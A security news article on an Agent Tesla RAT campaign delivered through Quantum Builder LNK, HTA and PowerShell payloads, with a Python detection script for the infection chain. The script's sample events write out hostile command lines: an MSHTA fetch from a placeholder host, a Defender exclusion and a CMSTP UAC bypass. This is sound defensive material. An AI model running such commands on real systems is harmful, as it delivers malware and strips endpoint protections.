The use of Dark Web Quantum Builder to run Agent Tesla RAT Malware

According to Zscaler ThreatLabz, a recent malicious campaign is distributing the Agent Tesla RAT with payloads produced by Quantum Builder, a malware builder. Agent Tesla is a .NET-based keylogger and remote access trojan that has been active since 2014.

This campaign is more advanced than earlier ones and relies more heavily on LNK (Windows shortcut) files.

Quantum Builder

Quantum Builder, also known as Quantum Link Builder, is a tool cybercriminals use to produce malicious shortcut files. The campaign has been linked to the Lazarus Group APT on the basis of shared TTPs and source-code overlaps, but security analysts could not confidently attribute it to a particular threat actor.

The threat actors behind this campaign create malicious payloads such as LNK, HTA, and PowerShell using Quantum Builder.

Once these payloads are built, threat actors use them to spread Agent Tesla. The builder employs a range of evasion techniques, including anti-analysis tricks, obfuscation, and anti-virtualisation checks.

User Account Control (UAC) is bypassed using the Microsoft Connection Manager Profile Installer (CMSTP) binary.

Windows Defender exclusions are also set up. The multi-stage infection chain combines several attack vectors and relies on LOLBins (living-off-the-land binaries), and the PowerShell scripts are executed in memory to evade detection.

Quantum Builder is sold on the dark web for €189 for a one-month subscription, €355 for two months, €899 for six months, or €1,500 as a one-time lifetime purchase.

Quantum Builder is a customisable tool that cybercriminals can use to create malicious shortcut files. In addition, it can produce malicious payloads like HTA, ISO, and PowerShell.

These payloads are used to deliver Agent Tesla, the next-stage payload, to the targeted PCs.

Infection Chain

The multi-stage infection chain begins with a phishing email carrying a GZIP archive attachment. The archive contains a shortcut (LNK) file that runs PowerShell code, which in turn launches a remote HTA via MSHTA.

The phishing emails are disguised as order confirmations purporting to come from a Chinese distributor of lump and rock sugar (Guangdong Nanz Technology Co. Ltd). The email carries a malicious LNK file posing as a legitimate PDF document.

The HTA file then decrypts and runs a PowerShell loader script, which acts as both downloader and executor, running Agent Tesla with administrative privileges.
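The chain described above (LNK launching PowerShell, MSHTA fetching a remote HTA, a PowerShell loader, plus the CMSTP UAC bypass and Defender exclusions mentioned earlier) maps directly onto process-creation telemetry. The following detection sketch is an added example written for this page; it is not code from Zscaler ThreatLabz or from the article. It assumes a simplified event record (pid, parent pid, image name, command line), all sample events are constructed, the `example.invalid` host and the file paths are placeholders rather than real indicators, and the tag names are this example's own.

```python
"""Flag the Quantum Builder / Agent Tesla style process chain in
process-creation telemetry (Sysmon Event ID 1 or EDR style records).
Added example; the sample events below are constructed, not real data.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # executable name, lower-case
    cmdline: str
    parent_image: str   # parent executable name, lower-case


# Script hosts / LOLBins the chain moves through; the top-most one in a
# process tree is treated as the stage-one loader that the LNK started.
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmstp.exe"}

REMOTE_URL = re.compile(r"https?://", re.I)
STEALTH_FLAGS = re.compile(
    r"-(w(indowstyle)?\s+hidden|enc(odedcommand)?\b|ep\s+bypass|executionpolicy\s+bypass)",
    re.I)
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\s+-Exclusion", re.I)
INF_ARG = re.compile(r"\.inf\b", re.I)


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection tags a single process-creation event triggers."""
    hits = []
    if ev.image == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
        hits.append("mshta_remote_hta")            # remote HTA pulled by MSHTA
    if ev.image == "powershell.exe":
        if STEALTH_FLAGS.search(ev.cmdline):
            hits.append("powershell_stealth_flags")  # hidden window / encoded / bypass
        if DEFENDER_EXCLUSION.search(ev.cmdline):
            hits.append("defender_exclusion_added")  # Defender exclusion set up
        if ev.parent_image == "mshta.exe":
            hits.append("powershell_from_mshta")     # HTA handing off to a PS loader
    if (ev.image == "cmstp.exe" and INF_ARG.search(ev.cmdline)
            and ev.parent_image in SCRIPT_HOSTS):
        hits.append("cmstp_from_script_host")        # CMSTP driven by a script host
    return hits


def chain_root(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> int:
    """Walk up the ancestry and return the pid of the top-most script host."""
    top, cur = ev.pid, ev
    while cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
        if cur.image in SCRIPT_HOSTS:
            top = cur.pid
    return top


def detect_chain(events, min_stages: int = 2) -> dict[int, list[str]]:
    """Group tags by the loader that started them and report only trees that
    show at least min_stages distinct tags, so one hidden-window script alone
    does not page anyone."""
    by_pid = {e.pid: e for e in events}
    trees: dict[int, set[str]] = {}
    for e in events:
        hits = classify(e)
        if hits:
            trees.setdefault(chain_root(e, by_pid), set()).update(hits)
    return {root: sorted(tags) for root, tags in trees.items() if len(tags) >= min_stages}


# Constructed sample telemetry (placeholder host and paths, not real IoCs).
# pid 101 is what a double-clicked LNK looks like: explorer.exe spawning PowerShell.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe", "userinit.exe"),
    ProcEvent(101, 100, "powershell.exe",
              'powershell.exe -NoProfile -WindowStyle Hidden -c "mshta http://example.invalid/order.hta"',
              "explorer.exe"),
    ProcEvent(102, 101, "mshta.exe", "mshta.exe http://example.invalid/order.hta", "powershell.exe"),
    ProcEvent(103, 102, "powershell.exe",
              'powershell.exe -ep bypass -c "Add-MpPreference -ExclusionPath C:\\Users\\Public"',
              "mshta.exe"),
    ProcEvent(104, 102, "cmstp.exe", "cmstp.exe /ni /s C:\\Users\\Public\\profile.inf", "mshta.exe"),
    # Benign admin script launched from the desktop: must not be reported.
    ProcEvent(200, 100, "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1", "explorer.exe"),
]

if __name__ == "__main__":
    for root, tags in detect_chain(SAMPLE_EVENTS).items():
        print(f"suspicious chain rooted at pid {root}: {', '.join(tags)}")
```

Run as-is and the only tree reported is the one rooted at pid 101, carrying all five tags, while the benign `backup.ps1` launch is ignored. The aggregation step is the point: each individual indicator (a hidden PowerShell window, an `.inf` passed to CMSTP) is noisy on its own, but several of them under the same stage-one loader is what the article's chain looks like on an endpoint. In production the records would come from Sysmon or EDR, and the command-line patterns would need tuning for local admin tooling.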

Use of Quantum Builder has increased in recent months as threat actors adopt it to spread a range of malware. In a second variant of the infection chain, a ZIP file is used in place of the GZIP archive.

Quantum Builder has been used to build malware payloads in several recent campaigns against businesses, the latest of which is this Agent Tesla operation.


